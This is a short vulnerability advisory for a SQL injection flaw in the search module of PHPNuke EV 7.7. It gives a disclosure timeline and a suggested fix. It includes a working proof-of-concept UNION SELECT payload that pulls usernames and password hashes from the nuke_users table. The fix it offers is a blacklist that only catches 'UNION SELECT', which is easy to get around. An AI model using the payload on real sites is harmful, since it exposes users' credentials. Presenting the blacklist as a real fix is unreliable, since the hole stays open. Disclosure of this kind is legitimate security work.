PHPNuke EV 7.7 have a flaw which can be exploited by malicious
people to conduct SQL injection attacks.

Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

#################
versions:
################

PHPNuke EV 7.7 -R1

posible prior versions are afected.

##################
solution:
###################

No solution at this time!!!

A posible fix:

Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------

you can add this other :

------------------------------------

if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
die();
}
----------------------------------------------
this is a "simple fix " only detect UNION SELECT comand and die
if this is in the query variable... you can write the same code for
UNION ALL SELECT or other varians of xploit

####################
Timeline
####################

discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006

###################
example:
###################

go to
http://[Victim]/modules.php?name=Search

and write in the search box this proof

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

all users hashes are available to view..

#################### €nd ########################

Thnx to estrella to be my ligth